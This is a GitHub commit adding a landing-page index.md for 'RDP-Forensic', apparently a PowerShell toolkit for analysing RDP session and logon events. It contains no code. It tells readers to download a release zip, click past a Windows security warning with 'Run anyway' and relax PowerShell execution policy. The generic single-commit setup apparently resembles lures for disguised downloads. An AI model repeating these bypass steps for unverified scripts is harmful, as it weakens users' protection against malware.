Skip to content

Commit 7e39cef

Browse files
committed
Commit
0 parents  commit 7e39cef

File tree

1 file changed

+72
-0
lines changed

1 file changed

+72
-0
lines changed

index.md

Lines changed: 72 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,72 @@
1+
---
2+
layout: "default"
3+
title: "🔍 RDP-Forensic - Simplify Your RDP Analysis"
4+
description: "🖥️ Analyze and track Remote Desktop Protocol connections in Windows with this comprehensive PowerShell toolkit designed for forensic investigations."
5+
---
6+
# 🔍 RDP-Forensic - Simplify Your RDP Analysis
7+
8+
## 📥 Download Now
9+
[![Download RDP-Forensic](https://img.shields.io/badge/Download-RDP--Forensic-blue)](https://github.com/Vectoricks/RDP-Forensic/releases)
10+
11+
## 🚀 Getting Started
12+
RDP-Forensic is a PowerShell toolkit designed to help you track and analyze Remote Desktop Protocol (RDP) activities on your Windows servers. This guide will help you download and run the software, even if you have no technical background.
13+
14+
## 📂 What is RDP-Forensic?
15+
RDP-Forensic provides tools to monitor and analyze connection attempts, user logins, and logoffs from Windows Event Logs. It simplifies security monitoring and incident response, making it easier for you to keep your systems safe.
16+
17+
## 💻 System Requirements
18+
To run RDP-Forensic, you will need:
19+
- Windows 10 or Windows Server 2016 and later
20+
- PowerShell 5.1 or newer
21+
- At least 100 MB of free disk space
22+
23+
## 📥 Download & Install
24+
1. Visit the [Releases page](https://github.com/Vectoricks/RDP-Forensic/releases).
25+
2. You will see various versions listed. Choose the latest version marked as "Latest Release."
26+
3. Click on the .zip file to download it to your computer.
27+
4. After downloading, locate the file in your Downloads folder.
28+
5. Right-click on the .zip file and select "Extract All," then follow the prompts to unpack the files.
29+
30+
## ⚙️ Running RDP-Forensic
31+
1. Open the folder where you extracted RDP-Forensic.
32+
2. Double-click on `RDP-Forensic.ps1` to run the application.
33+
3. You might see a security warning. If so, click "More info," then select "Run anyway."
34+
35+
## 🔍 Features
36+
- **Session Tracking:** Monitor user sessions in real-time.
37+
- **Authentication Monitoring:** Keep track of successful and failed login attempts.
38+
- **Event Logging:** Automatically read from Windows Event Logs to provide comprehensive forensic data.
39+
- **Compliance Checks:** Ensure your RDP setup complies with industry standards.
40+
- **Easy Reports:** Generate simple reports for your security audits.
41+
42+
## 💡 Using RDP-Forensic
43+
Once you have RDP-Forensic open, you'll see a simple menu. Here’s what each option does:
44+
45+
- **Track Sessions:** Select this to view current active sessions.
46+
- **Logon Analysis:** Choose this to review login attempts over a specified time.
47+
- **Export Reports:** Save your findings in a user-friendly format.
48+
49+
## 🌟 Troubleshooting
50+
- **PowerShell Script Execution Policy:** You may need to adjust your PowerShell execution settings. To do this:
51+
1. Open PowerShell as an Administrator.
52+
2. Enter the command: `Set-ExecutionPolicy RemoteSigned`.
53+
54+
- **Permission Issues:** Ensure you have the required permissions to access the Windows Event Logs.
55+
56+
## 🔒 Security and Compliance
57+
The RDP-Forensic toolkit helps you meet security standards through proper monitoring. Regular audits can minimize risks and improve compliance with regulations.
58+
59+
## 🛠️ Community Support
60+
For help and resources, visit our [GitHub Discussions](https://github.com/Vectoricks/RDP-Forensic/discussions). You can ask questions, share experiences, or find answers to common issues.
61+
62+
## 📄 Additional Resources
63+
- [PowerShell Documentation](https://docs.microsoft.com/en-us/powershell/)
64+
- [Windows Event Logging Guide](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-logging)
65+
66+
For the latest updates and features, remember to check the [Releases page](https://github.com/Vectoricks/RDP-Forensic/releases) often.
67+
68+
## 📞 Contact
69+
If you have any questions, please reach out to us through the GitHub Issues page of the repository. We aim to respond within 24 hours.
70+
71+
## 📥 Download Now Again
72+
[![Download RDP-Forensic](https://img.shields.io/badge/Download-RDP--Forensic-blue)](https://github.com/Vectoricks/RDP-Forensic/releases)

0 commit comments

Comments
 (0)